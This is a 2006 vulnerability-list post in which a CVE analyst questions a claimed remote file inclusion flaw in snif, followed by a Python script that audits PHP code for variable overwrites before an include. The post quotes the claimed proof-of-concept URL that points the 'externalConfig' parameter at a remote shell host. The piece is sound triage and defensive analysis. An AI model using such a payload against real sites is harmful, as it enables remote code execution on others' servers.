[VIM] snif RFI curiosity
Steven M. Christey
coley at mitre.org
Mon Dec 4 00:15:09 EST 2006
Researcher: S.W.A.T.
Ref: http://www.milw0rm.com/exploits/2868
Claimed POC:
[path]/index.php?externalConfig=http://shell?
A CVE analyst noted that in the referenced URL, we have:
$externalConfig = "";
on line 428, and:
if ($externalConfig!="") {
    include($externalConfig);
}
on line 1227.
While $_GET is cleansed in a way that feels funny on line 1215, there
is no apparent dynamic variable evaluation, include/require, or eval
in between the two lines.
So this report might not be valid, but with such a gap in the code,
I'm not sure.
- Steve
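
A sketch of the gap check described in the message above, as an added example that is not part of the original post or of the snif source: it lists lines between a variable's initialisation and its include that could reassign the variable. The PHP samples are constructed, and the pattern list is an assumption about what is worth flagging, not an exhaustive one.

```python
import re

# Constructs that can overwrite a global from request data, or run other code
# that might, between a variable's initialisation and its later use.
RISKY = {
    "extract()": re.compile(r"\bextract\s*\(", re.I),
    "parse_str() with one argument": re.compile(r"\bparse_str\s*\([^,()]*\)", re.I),
    "import_request_variables()": re.compile(r"\bimport_request_variables\s*\(", re.I),
    "variable variable": re.compile(r"\$\$\w|\$\{\s*\$"),
    "eval()": re.compile(r"\beval\s*\(", re.I),
    "include/require": re.compile(r"\b(?:include|require)(?:_once)?\b", re.I),
}

def audit_gap(source, var, init_line, sink_line):
    """Return [(line_no, reason)] for lines strictly between init and sink
    (1-based) that could change $var before the sink uses it."""
    assign = re.compile(r"\$" + re.escape(var) + r"\s*\.?=(?!=)")
    findings = []
    lines = source.splitlines()
    for no in range(init_line + 1, sink_line):
        text = lines[no - 1].strip()
        if text.startswith(("//", "#", "*", "/*")):
            continue  # crude comment skip; good enough for triage
        if assign.search(text):
            findings.append((no, "direct assignment"))
        for reason, pattern in RISKY.items():
            if pattern.search(text):
                findings.append((no, reason))
    return findings

# Constructed samples (not the snif source): same init/sink shape as the post.
CLEAN = '''<?php
$externalConfig = "";
foreach ($_GET as $k => $v) { $_GET[$k] = strip_tags($v); }
if ($externalConfig!="") {
    include($externalConfig);
}
'''
# Same file with one request-driven overwrite inserted before the check.
OVERWRITTEN = CLEAN.replace("if (", "extract($_GET);\nif (", 1)

if __name__ == "__main__":
    print(audit_gap(CLEAN, "externalConfig", 2, 5))
    print(audit_gap(OVERWRITTEN, "externalConfig", 2, 6))
```

An empty result supports the reading that the variable is still the empty string at the include; any finding marks a line to review by hand.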